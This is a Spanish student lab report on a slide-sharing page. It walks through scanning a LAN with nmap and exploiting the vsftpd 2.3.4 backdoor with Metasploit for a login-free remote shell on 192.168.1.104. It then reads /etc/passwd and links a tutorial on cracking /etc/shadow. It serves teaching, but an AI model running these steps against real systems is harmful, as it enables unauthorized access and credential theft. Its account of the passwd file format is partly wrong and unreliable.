MB
Subido porMiguel Ángel Marchal Barrera
DOCX, PDF846 vistas

Explotación sistema operativo

Este documento describe los pasos para escanear una red local, identificar sistemas operativos y servicios abiertos, explotar vulnerabilidades remotas utilizando Metasploit y acceder a una máquina de manera no autorizada para listar archivos y directorios. Se explican comandos como nmap, telnet, ftp y ssh para analizar puertos, servicios y versiones, así como usar exploits de Metasploit como vsftpd_234_backdoor para acceder de forma remota sin necesidad de credenciales.

Tecnología
Temas relacionados:
Kali Linux

Incrustar presentación

Descargar para leer sin conexión
Miguel Ángel Marchal Barrera COLEGIO CIUDAD DE LOS MUCHACHOS SISTEMAS MICROINFORMÁTICOS Y REDES CURSO 2016/2017 EXPLOTACIÓN SISTEMA OPERATIVO
PÁGINA 1|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS IDENTIFICACIÓN DEL OBJETIVO Comprobar si tenemosacceso a la máquina que queremosatacar Comandoping+ direccióndel interfazde red Abrirel terminal de Kali-linux Introducir:ping192.168.1.104 (esla direccióndel equipoaatacar) Si tenemosconectividad nose perderáningúnpaquete enviado Detectar los equiposactivos de la red Comandonmap –sP + direcciónde red Introducir:nmap–sP 192.168.1.0/24 Escaneala red enbusca de losequiposque estánfuncionandoenlaLAN mostrandolasMAC y lasdireccionesIPde cada equipo.
PÁGINA 2|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS ANÁLISIS DE PUERTOS Y SERVICIOS Identificaciónde puertosque usa la máquina Comandonmap –sT -O+ direccióndel interfazde red Introducir:nmap –sT -O192.168.1.104 Muestra lospuertosque utilizanlamáquinay laversióndel sistemaoperativo
PÁGINA 3|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS Comprobar versionesde servicios Comandonmap –sT –sV direccióndel interfazde red Introducir:nmap –sT –sV 192.168.1.104 Muestra puertosabiertos,serviciosyversionesde éstos. Comprobar versionesde serviciosmediante comando telnet Comandotelnet+IP del interfazde red+ puertoabierto Introducir:telnet192.168.1.104 21 Muestra laversióndel serviciodelpuertoseleccionado parasabersi esposible que exista algunavulnerabilidadenlaversión.
PÁGINA 4|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS Conexióna través del servicioseleccionado Comandotelnet,FTPySSH Accesocon comandotelnet Comandotelnet+IP interfazde red Introducir:telnet192.168.1.104 Accedemosala máquinaymuestrael interfazde textopidiendologin desconocido. Accesocon comandoFTP Comandoftp + IPinterfazde red Introducir:ftp192.168.1.104 Accesomediante servicioftppidiendocontraseña desconocida. Accesocon comandoSSH Comandossh + IP interfazde red Introducir:ssh 192.168.1.104 Accesomediante serviciosshpidiendocontraseña desconocida.
PÁGINA 5|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS ANÁLISIS DE VULNERABILIDADES Herramientametasploit Iniciarla herramientaintroduciendo:msfconsole Comprobarlos exploitsde laversiónque puedenhacervulnerable el accesoporel servicio Introducircomando:searchftp Lista de exploitsque podemosutilizarparaaccederde modo remotoa la máquinaque queremosatacar.
PÁGINA 6|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS EXPLOTACIÓN DE VULNERABILIDADES Localizamosel xploitpreparadoparaatacar Este exploitnosinformaque es excelente parausar. Para usar el xploit Comandouse + direccióndel exploit Introducir:use exploit/unix/ftp/vsftpd_234_backdoor Comprobarla configuraciónde parámetros Comandoshowoptions Introducir:showoptions Se compruebasi se necesitaalgunaconfiguraciónadicional parausarel exploit,necesitaremos configurarel RHOST asignandolaIPde lamáquinaatacada. RHOST: Remote Host. RPORT: Remote Port. ConfiguraciónRHOST ComandosetRHOST + direccióndel interfazde red Introducir:setRHOST 192.168.1.104
PÁGINA 7|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS Buscar payloaddisponible Comandoshowpayloads Introducir:showpayloads Muestra el disponible Utilizarel payloaddisponible Comandosetpayload + payloaddisponible Introducir:setpayloadcmd/unix/interact Accederremotamente alamáquina Comandoexploit Introducior:exploit Accesopermitidoremotoalamáquinaatacada. Con este últimocomandohabremosaccedidoalamáquinafinalmente,sinnecesidadde login de ningúntipoy se podrá accedera losdirectoriosyarchivosde maneratransparante.
PÁGINA 8|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS POST-EXPLOTACIÓN DEL SISTEMA Uso de comandoscomosi estuviéramosenlamismamáquina. Comandols Directoriosde laraíz de la máquinaatacada.
PÁGINA 9|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS Obtenciónde contraseña Comandocat Introducir:cat etc/passwd La estructuraes: <nombre>,<password><uid>, <gid>,<descripción opcional> <carpeta>, <shell> <nombre>: Nombre de usuario. <password>: Si es igual a “x” la contraseña está almacenada en /etc/shadow, si es igual a “!” el usuario está bloqueado y si es igual a “!!” no tiene contraseña. <uid>: Número de identificador, para root 0, para los demás un número entre 1 y 65535. <gid>: Grupo al que está asignado. <descripción opcional>: Descripción añadida al perfil de usuario. <carpeta>: Carpeta de inicio de usuario de cada usuario. <shell>: Intérprete de línea de comandos de Linux. Con esto no descifraremos la contraseña, sólo veremos los usuarios configurados, ésta está alojada en etc/shadowy está encriptada, para ello existen herramientas y tutoriales paso a paso para descifrarlas, en este link se explica cómo. https://www.youtube.com/watch?v=DntHkcbq-wY

Más contenido relacionado

PDF
Configuracion De Eigrp Y Loopback
porCésar Nuñez
 
PPT
Seguridad layer 2
pors3m1llon
 
PDF
Alarmas bts ericsson
porMarcos Dominguez
 
DOCX
Carga del sistema operativo
porSebastian Gordillo
 
PDF
Laboratorio Crear, Verificar y Borrar Vlan
porccardila
 
PPT
Configuración acl extendida
porMarbella Arroyo Gonzalez
 
PDF
Tutorial de configuracion de routers
porAlexander Paiz
 
PDF
Practica 1 iptables
por1 2d
 
Configuracion De Eigrp Y Loopback
porCésar Nuñez
 
Seguridad layer 2
pors3m1llon
 
Alarmas bts ericsson
porMarcos Dominguez
 
Carga del sistema operativo
porSebastian Gordillo
 
Laboratorio Crear, Verificar y Borrar Vlan
porccardila
 
Configuración acl extendida
porMarbella Arroyo Gonzalez
 
Tutorial de configuracion de routers
porAlexander Paiz
 
Practica 1 iptables
por1 2d
 

La actualidad más candente

DOC
Ejercicio ccna 3
porSebastian Hevia
 
PDF
Examen l ry s diciembre2005 resuelto
porAlfonso
 
PPTX
Ejercicio 23 05-2016 cisco packet tracer
porInmaculada Concepción
 
PPTX
EJERCICIOS EN PACKET TRACER
porDaniella Park
 
PDF
Práctica final acl
porchinazo
 
PPTX
Resumen comandos router
porjlvive
 
PDF
Comandos Configuración Router CISCO
porDavid Fernando Marìn
 
DOCX
compu
porLesly Elizalde
 
DOCX
Eliminar una vlan
porAime Rodriguez
 
PDF
Laboratorio Vlan
porccardila
 
DOCX
Solucion de acl juntas
porLicenciatura en Redes y Sistemas Operativos
 
DOCX
Configurar vlan en packet tracer
porJushaya Wílliams
 
PPTX
Acl extendida
porYessica B. Leyva Avalos
 
PDF
Ejercicios ripv2
poralejandro colan
 
PDF
Configurando Ospf Dr Y Bdr
porCésar Nuñez
 
PDF
Comandos de configuracion de dispositivos cisco
porCISCO NETWORKING
 
PDF
Configuración Firewall - CISCO ASA 5510
porVanesa Rodríguez Percy
 
PDF
Laboratorio 8 enrutamiento dinamico part 2
poryoes1053
 
DOCX
Practica con firewall asa
porwebsyo
 
PDF
Guia básica Packet Tracer
porErick Calderin
 
Ejercicio ccna 3
porSebastian Hevia
 
Examen l ry s diciembre2005 resuelto
porAlfonso
 
Ejercicio 23 05-2016 cisco packet tracer
porInmaculada Concepción
 
EJERCICIOS EN PACKET TRACER
porDaniella Park
 
Práctica final acl
porchinazo
 
Resumen comandos router
porjlvive
 
Comandos Configuración Router CISCO
porDavid Fernando Marìn
 
compu
porLesly Elizalde
 
Eliminar una vlan
porAime Rodriguez
 
Laboratorio Vlan
porccardila
 
Solucion de acl juntas
porLicenciatura en Redes y Sistemas Operativos
 
Configurar vlan en packet tracer
porJushaya Wílliams
 
Acl extendida
porYessica B. Leyva Avalos
 
Ejercicios ripv2
poralejandro colan
 
Configurando Ospf Dr Y Bdr
porCésar Nuñez
 
Comandos de configuracion de dispositivos cisco
porCISCO NETWORKING
 
Configuración Firewall - CISCO ASA 5510
porVanesa Rodríguez Percy
 
Laboratorio 8 enrutamiento dinamico part 2
poryoes1053
 
Practica con firewall asa
porwebsyo
 
Guia básica Packet Tracer
porErick Calderin
 

Similar a Explotación sistema operativo

PDF
Ataque win xp
pordarlyjazmin
 
PDF
Metasploit
porJose Peña
 
PDF
731066678-Tema-6-Post-Explotacion-731066678-Tema-6-Post-Explotacion.pdf.pdf
porDavid Vera Olivera, PMP®, ITIL, SCM®
 
PPTX
Escaneo de Puertos
porarnoldvq16
 
PDF
Recopilación de Penetration Test Backtrack
porLuis Fernando Aguas Bucheli
 
PDF
Proof of concept: Auditando sistema con METASPLOIT
porBTshell-Fran
 
ODP
Pentesting Basico
porCuauhtémoc García Somera
 
PPTX
731066678-Tema-6-Post-Explotacion-Pentesting.pptx
porDavid Vera Olivera, PMP®, ITIL, SCM®
 
PDF
Seguridad: Backtrack2
porFrancesc Perez
 
PDF
Penetrar un servidor unix por el puerto 139 con metasploit
porBTshell-Fran
 
PDF
Seguridad perimetral - Mikrotik Firewall
porVanesa Rodríguez Percy
 
PDF
Actividadno1seguridadperimetral -conversion-gate01
porpattala01
 
PDF
Escaneo, enumeración de puertos en la red. OMHE
porHéctor López
 
PDF
Debian hackers elementals
porAlejandro Garces
 
ODP
Curso Avanzado Seguridad Redes
porAntonio Durán
 
PDF
Documento
poralejandroprietosuare
 
PPTX
Caso práctico - Test de Intrusión
porAntonio González Castro
 
PDF
Backtrack 5 manual traducido
porMillward Brown
 
PDF
Backtrack 5 manual traducido
porEnrique Ventura Huallcca
 
PDF
Episodio de pentesting
porakencito
 
Ataque win xp
pordarlyjazmin
 
Metasploit
porJose Peña
 
731066678-Tema-6-Post-Explotacion-731066678-Tema-6-Post-Explotacion.pdf.pdf
porDavid Vera Olivera, PMP®, ITIL, SCM®
 
Escaneo de Puertos
porarnoldvq16
 
Recopilación de Penetration Test Backtrack
porLuis Fernando Aguas Bucheli
 
Proof of concept: Auditando sistema con METASPLOIT
porBTshell-Fran
 
Pentesting Basico
porCuauhtémoc García Somera
 
731066678-Tema-6-Post-Explotacion-Pentesting.pptx
porDavid Vera Olivera, PMP®, ITIL, SCM®
 
Seguridad: Backtrack2
porFrancesc Perez
 
Penetrar un servidor unix por el puerto 139 con metasploit
porBTshell-Fran
 
Seguridad perimetral - Mikrotik Firewall
porVanesa Rodríguez Percy
 
Actividadno1seguridadperimetral -conversion-gate01
porpattala01
 
Escaneo, enumeración de puertos en la red. OMHE
porHéctor López
 
Debian hackers elementals
porAlejandro Garces
 
Curso Avanzado Seguridad Redes
porAntonio Durán
 
Documento
poralejandroprietosuare
 
Caso práctico - Test de Intrusión
porAntonio González Castro
 
Backtrack 5 manual traducido
porMillward Brown
 
Backtrack 5 manual traducido
porEnrique Ventura Huallcca
 
Episodio de pentesting
porakencito
 

Explotación sistema operativo

  • 1.
    Miguel Ángel MarchalBarrera COLEGIO CIUDAD DE LOS MUCHACHOS SISTEMAS MICROINFORMÁTICOS Y REDES CURSO 2016/2017 EXPLOTACIÓN SISTEMA OPERATIVO
  • 2.
    PÁGINA 1|9 MIGUEL ÁNGELMARCHALBARRERA 2SMR C.MUCHACHOS IDENTIFICACIÓN DEL OBJETIVO Comprobar si tenemosacceso a la máquina que queremosatacar Comandoping+ direccióndel interfazde red Abrirel terminal de Kali-linux Introducir:ping192.168.1.104 (esla direccióndel equipoaatacar) Si tenemosconectividad nose perderáningúnpaquete enviado Detectar los equiposactivos de la red Comandonmap –sP + direcciónde red Introducir:nmap–sP 192.168.1.0/24 Escaneala red enbusca de losequiposque estánfuncionandoenlaLAN mostrandolasMAC y lasdireccionesIPde cada equipo.
  • 3.
    PÁGINA 2|9 MIGUEL ÁNGELMARCHALBARRERA 2SMR C.MUCHACHOS ANÁLISIS DE PUERTOS Y SERVICIOS Identificaciónde puertosque usa la máquina Comandonmap –sT -O+ direccióndel interfazde red Introducir:nmap –sT -O192.168.1.104 Muestra lospuertosque utilizanlamáquinay laversióndel sistemaoperativo
  • 4.
    PÁGINA 3|9 MIGUEL ÁNGELMARCHALBARRERA 2SMR C.MUCHACHOS Comprobar versionesde servicios Comandonmap –sT –sV direccióndel interfazde red Introducir:nmap –sT –sV 192.168.1.104 Muestra puertosabiertos,serviciosyversionesde éstos. Comprobar versionesde serviciosmediante comando telnet Comandotelnet+IP del interfazde red+ puertoabierto Introducir:telnet192.168.1.104 21 Muestra laversióndel serviciodelpuertoseleccionado parasabersi esposible que exista algunavulnerabilidadenlaversión.
  • 5.
    PÁGINA 4|9 MIGUEL ÁNGELMARCHALBARRERA 2SMR C.MUCHACHOS Conexióna través del servicioseleccionado Comandotelnet,FTPySSH Accesocon comandotelnet Comandotelnet+IP interfazde red Introducir:telnet192.168.1.104 Accedemosala máquinaymuestrael interfazde textopidiendologin desconocido. Accesocon comandoFTP Comandoftp + IPinterfazde red Introducir:ftp192.168.1.104 Accesomediante servicioftppidiendocontraseña desconocida. Accesocon comandoSSH Comandossh + IP interfazde red Introducir:ssh 192.168.1.104 Accesomediante serviciosshpidiendocontraseña desconocida.
  • 6.
    PÁGINA 5|9 MIGUEL ÁNGELMARCHALBARRERA 2SMR C.MUCHACHOS ANÁLISIS DE VULNERABILIDADES Herramientametasploit Iniciarla herramientaintroduciendo:msfconsole Comprobarlos exploitsde laversiónque puedenhacervulnerable el accesoporel servicio Introducircomando:searchftp Lista de exploitsque podemosutilizarparaaccederde modo remotoa la máquinaque queremosatacar.
  • 7.
    PÁGINA 6|9 MIGUEL ÁNGELMARCHALBARRERA 2SMR C.MUCHACHOS EXPLOTACIÓN DE VULNERABILIDADES Localizamosel xploitpreparadoparaatacar Este exploitnosinformaque es excelente parausar. Para usar el xploit Comandouse + direccióndel exploit Introducir:use exploit/unix/ftp/vsftpd_234_backdoor Comprobarla configuraciónde parámetros Comandoshowoptions Introducir:showoptions Se compruebasi se necesitaalgunaconfiguraciónadicional parausarel exploit,necesitaremos configurarel RHOST asignandolaIPde lamáquinaatacada. RHOST: Remote Host. RPORT: Remote Port. ConfiguraciónRHOST ComandosetRHOST + direccióndel interfazde red Introducir:setRHOST 192.168.1.104
  • 8.
    PÁGINA 7|9 MIGUEL ÁNGELMARCHALBARRERA 2SMR C.MUCHACHOS Buscar payloaddisponible Comandoshowpayloads Introducir:showpayloads Muestra el disponible Utilizarel payloaddisponible Comandosetpayload + payloaddisponible Introducir:setpayloadcmd/unix/interact Accederremotamente alamáquina Comandoexploit Introducior:exploit Accesopermitidoremotoalamáquinaatacada. Con este últimocomandohabremosaccedidoalamáquinafinalmente,sinnecesidadde login de ningúntipoy se podrá accedera losdirectoriosyarchivosde maneratransparante.
  • 9.
    PÁGINA 8|9 MIGUEL ÁNGELMARCHALBARRERA 2SMR C.MUCHACHOS POST-EXPLOTACIÓN DEL SISTEMA Uso de comandoscomosi estuviéramosenlamismamáquina. Comandols Directoriosde laraíz de la máquinaatacada.
  • 10.
    PÁGINA 9|9 MIGUEL ÁNGELMARCHALBARRERA 2SMR C.MUCHACHOS Obtenciónde contraseña Comandocat Introducir:cat etc/passwd La estructuraes: <nombre>,<password><uid>, <gid>,<descripción opcional> <carpeta>, <shell> <nombre>: Nombre de usuario. <password>: Si es igual a “x” la contraseña está almacenada en /etc/shadow, si es igual a “!” el usuario está bloqueado y si es igual a “!!” no tiene contraseña. <uid>: Número de identificador, para root 0, para los demás un número entre 1 y 65535. <gid>: Grupo al que está asignado. <descripción opcional>: Descripción añadida al perfil de usuario. <carpeta>: Carpeta de inicio de usuario de cada usuario. <shell>: Intérprete de línea de comandos de Linux. Con esto no descifraremos la contraseña, sólo veremos los usuarios configurados, ésta está alojada en etc/shadowy está encriptada, para ello existen herramientas y tutoriales paso a paso para descifrarlas, en este link se explica cómo. https://www.youtube.com/watch?v=DntHkcbq-wY